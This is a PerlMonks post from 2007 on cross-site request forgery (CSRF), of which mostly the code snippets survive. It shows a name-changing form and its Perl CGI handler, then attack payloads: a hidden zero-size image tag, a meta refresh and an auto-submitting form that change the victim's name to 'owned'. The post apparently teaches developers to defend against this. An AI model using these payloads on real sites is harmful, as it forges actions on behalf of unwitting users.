
go ahead... be a heretic
	PerlMonks

Is your web application really secure? ("CSRF")

by tinita (Parson)

on Mar 27, 2007 at 18:49 UTC ( #606832=perlmeditation: print w/ replies, xml )

Need Help??

Help for this page

Select Code to Download

Select or download this

<form action="http://yourdomain.example/script" method="POST">
<input type="text" name="realname">
<input type="submit" name="submit.save_realname" value="Save">
</form>

Select or download this

if ($cgi->param('submit.save_realname')) {
  my $name = $cgi->param('realname');
...
  $user->realname($name);
  $user->update;
}

Select or download this

<img src="http://yourdomain.example/script?submit.save_realname=1;real
+name=owned" height="0" width="0" alt="">
or even:
<meta http-equiv="refresh" content="0; URL=http://yourdomain.example/s
+cript?submit.save_realname=1;realname=owned">

Select or download this

<body onLoad="document.forms[0].submit()">
<form action="http://yourdomain.example/script" method="POST">
<input type="text" name="realname">
<input type="submit" name="submit.save_realname" value="Save">
</form>

Node Status^?

node history
Node Type: perlmeditation [id://606832]
Approved by Corion
Front-paged by Corion
help

Chatterbox^?

How do I use this? | Other CB clients

Other Users^?

Others perusing the Monastery: (11)

As of 2013-05-23 14:37 GMT

Sections^?

Information^?

Find Nodes^?

Leftovers^?

Voting Booth^?

The best material for plates (tableware) is:

Results (485 votes), past polls